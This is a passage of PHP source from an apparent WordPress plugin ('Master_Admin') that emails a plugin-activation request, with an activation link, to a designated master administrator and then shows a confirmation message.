			$activate_content = str_replace(array('%%plugin_name%%','%%admin_name%%','%%link%%'),array('<b>'.$myplugin.'</b>', '<b>'.$admin_name.'</b>','<a href="' . admin_url() . '?ap_custom_trigger=activated&plugin='.$myplugin.'&email='.base64_encode($current_user->user_email).'&adm='.base64_encode($admin_name).'">Click here to activate the plugin.</a>'), $activate_content);

			$msg = '
			<table width="100%">
				<tr>
					<td>'.apply_filters('the_content',stripslashes($activate_content)).'</td>
				</tr>

			</table>';

			$subject = $request_activation_subject;
			$headers = 'MIME-Version: 1.0' . "\r\n";
			$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
			$headers .= 'To: '.$request_activation_name.' <'.$request_activation_email.'>' . "\r\n";
			$headers .= 'From: '.$admin_name.' <'.$current_user->user_email.'>' . "\r\n";
			add_filter('wp_mail_content_type',create_function('', 'return "text/html";'));

			if(wp_mail($request_activation_email, $subject, $msg, $headers)) {
				 echo '<div style="background-color: lightYellow;border-color: #E6DB55; padding:10px; font-family: arial; font-size: 12px;"><p>'.$request_activation_name.' has been sent your request to activate the plugin.</p></div>';
				 echo '<script type="text/javascript">
		setTimeout(function() {
    		self.parent.tb_remove()
		}, 3000);</script>';
			}
			else {
				wp_die('Error in sending activation request to The Master Admin!');
			}
			exit;
		}
	}

}

$admin_protect = new Master_Admin();
